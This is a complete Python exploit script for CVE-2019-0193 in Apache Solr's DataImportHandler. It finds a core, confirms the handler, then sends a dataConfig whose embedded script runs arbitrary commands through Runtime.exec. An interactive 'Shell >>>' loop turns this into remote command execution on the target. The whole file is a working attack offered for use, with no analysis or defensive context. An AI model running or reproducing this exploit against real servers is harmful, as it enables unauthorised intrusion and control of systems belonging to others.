#coding=utf-8

import requests
import sys
import json
import urllib.parse

if len(sys.argv)!=2:
    print('+ USE: python3 cve-2019-0193.py <url> +')
    sys.exit(0)

url = sys.argv[1]
vuln_url = url + "/solr/test/dataimport"
cmd = "whoami"


#get core name
core_url = url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
    r = requests.request("GET", url=core_url, timeout=20)
    core_name = list(json.loads(r.text)["status"])[0]
    print ("[+] GET CORE NAME: "+url+"/solr/"+core_name+"/config")
except:
    print ("[-] Target Not Vuln Good Luck")
    sys.exit(0)

#check mode
mode_url = url + "/solr/" +core_name+ "/admin/mbeans?cat=QUERY&wt=json"
r = requests.request("GET", url=mode_url, timeout=20)
mode = dict(dict(list(json.loads(r.text)["solr-mbeans"])[1])['/dataimport'])['class']
if "org.apache.solr.handler.dataimport.DataImportHandler" in mode:
    print ("[+] FIND MODE: "+mode)
else:
    print ("[-] Target Not Vuln Good Luck")
    sys.exit(0)

exp_url = url + "/solr/" +core_name+ "/dataimport"

headers = {
    'Host': "localhost:8983",
    'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36",
    'Accept': "application/json, text/plain, */*",
    'Accept-Language': "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    'Accept-Encoding': "zip, deflate",
    'Referer': ""+url+"/solr/",
    'Content-type': "application/x-www-form-urlencoded",
    'X-Requested-With': "XMLHttpRequest",
    'Content-Length': "1007",
    'Connection': "close"
    }

def do_exp(cmd):
    payload = """
    command=full-import&verbose=false&clean=false&commit=false&debug=true&core=test&name=dataimport&dataConfig=
    <dataConfig>
      <dataSource type="URLDataSource"/>
      <script><![CDATA[
              function poc(row){
     var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("%s").getInputStream()));
    var result = [];
    while(true) {
    var oneline = bufReader.readLine();
    result.push( oneline );
    if(!oneline) break;
    }
    row.put("title",result.join("\\n\\r"));
    return row;
    }
      ]]></script>
            <document>
                 <entity name="entity1"
                         url="https://raw.githubusercontent.com/1135/solr_exploit/master/URLDataSource/demo.xml"
                         processor="XPathEntityProcessor"
                         forEach="/RDF/item"
                         transformer="script:poc">
                            <field column="title" xpath="/RDF/item/title" />
                 </entity>
            </document>
    </dataConfig>
    """ % cmd
    r = requests.request("POST", url=exp_url, data=payload, headers=headers, timeout=30)
    try:
        get_r = list(json.loads(r.text)["documents"])[0]
        q = dict(get_r)['title']
        print (q)
    except:
        print ("[*] Please wait... ... (About 1 minute)")
    
while 1:
    cmd = input("Shell >>> ")
    if cmd == "exit" : exit(0)
    do_exp(cmd)